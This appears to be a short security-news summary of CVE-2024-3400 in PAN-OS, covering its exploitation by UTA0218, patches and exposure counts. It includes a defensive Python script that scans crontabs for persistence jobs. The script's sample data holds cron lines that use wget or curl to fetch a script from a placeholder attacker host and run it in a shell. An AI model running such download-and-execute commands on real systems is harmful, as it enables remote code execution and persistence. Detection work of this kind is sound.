April 20, 2024 at 01:57AM
Palo Alto Networks has disclosed a critical security flaw, CVE-2024-3400, in PAN-OS that is being actively exploited by threat actors. The flaw allows unauthenticated remote shell command execution via a two-stage attack. The company has expanded patches to cover affected software versions and recommends applying hotfixes to mitigate potential threats. CISA has added this vulnerability to its Known Exploited Vulnerabilities catalog.
These meeting notes concern a critical security flaw, CVE-2024-3400, in PAN-OS that is being actively exploited by threat actors in the wild. According to Palo Alto Networks, the vulnerability is a combination of two bugs in PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1; when chained together, they allow unauthenticated remote shell command execution.
The threat actor behind the zero-day exploitation, tracked as UTA0218, carried out a two-stage attack named Operation MidnightEclipse, using a backdoor called UPSTYLE to achieve command execution on susceptible devices. The initial persistence mechanism was a cron job that used wget to retrieve a payload from an attacker-controlled URL; the payload executed specific commands and downloaded reverse-proxy tooling such as GOST.
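As an added illustration (not code from the original notes or from Palo Alto Networks), the following Python triage check reads crontab text and flags entries that use wget or curl to fetch a remote URL, the persistence pattern described above, rating an entry higher when the download is executed or the job runs every minute. The crontab sample and its host names are constructed placeholders, not indicators from any real incident.

```python
import re

# Constructed sample crontab (illustrative only; host names are placeholders,
# not indicators from the notes above or from any real incident).
SAMPLE_CRONTAB = """\
0 3 * * * /usr/bin/apt-get update -q
* * * * * /usr/bin/wget -qO- http://attacker-controlled.invalid/patch.txt | bash
*/5 * * * * curl -s https://attacker-controlled.invalid/x.sh -o /tmp/x.sh && sh /tmp/x.sh
30 2 * * 0 /usr/local/bin/backup.sh
@reboot /usr/bin/wget -q http://mirror.example.internal/health.txt -O /dev/null
"""

DOWNLOADER = re.compile(r"\b(?:wget|curl)\b")
REMOTE_URL = re.compile(r"https?://\S+")
# Hints that the fetched content is executed: piped to a shell, run after '&&', or chmod +x.
EXEC_HINT = re.compile(r"\|\s*(?:ba)?sh\b|&&\s*(?:ba)?sh\b|\bchmod\s+\+x\b")

def parse_cron_line(line):
    """Return (schedule, command) for a crontab entry, or None for comments/blank lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):                     # @reboot, @hourly, ...
        parts = line.split(None, 1)
        return parts[0], (parts[1] if len(parts) > 1 else "")
    parts = line.split(None, 5)                  # five schedule fields, then the command
    if len(parts) < 6:
        return None
    return " ".join(parts[:5]), parts[5]

def find_suspicious(crontab_text):
    """Flag cron entries that fetch a remote URL with wget/curl and rate their severity."""
    findings = []
    for raw in crontab_text.splitlines():
        parsed = parse_cron_line(raw)
        if parsed is None:
            continue
        schedule, command = parsed
        url = REMOTE_URL.search(command)
        if not (DOWNLOADER.search(command) and url):
            continue
        executes = bool(EXEC_HINT.search(command))   # download chained into execution?
        every_minute = schedule == "* * * * *"       # aggressive beaconing cadence
        findings.append({
            "schedule": schedule, "command": command, "url": url.group(0),
            "executes": executes, "every_minute": every_minute,
            "severity": "high" if (executes or every_minute) else "medium",
        })
    return findings
```

Running `find_suspicious` over a host's `crontab -l` output or the files under `/etc/cron.d` gives a quick list of download-and-run jobs to review; a medium finding can still be legitimate (an internal mirror check, as in the sample), so treat it as a lead rather than a verdict.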
Palo Alto Networks confirmed that device telemetry has no bearing on whether a device is vulnerable and has expanded patches to cover commonly deployed maintenance releases.
In light of the active exploitation and the availability of proof-of-concept exploit code, users are recommended to apply the hotfixes as soon as possible. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has included the vulnerability in its Known Exploited Vulnerabilities (KEV) catalog, ordering federal agencies to secure their devices by April 19, 2024.
According to the Shadowserver Foundation, approximately 22,542 internet-exposed firewall devices are likely vulnerable to CVE-2024-3400, with the majority located in the U.S., Japan, India, Germany, the U.K., Canada, Australia, France, and China.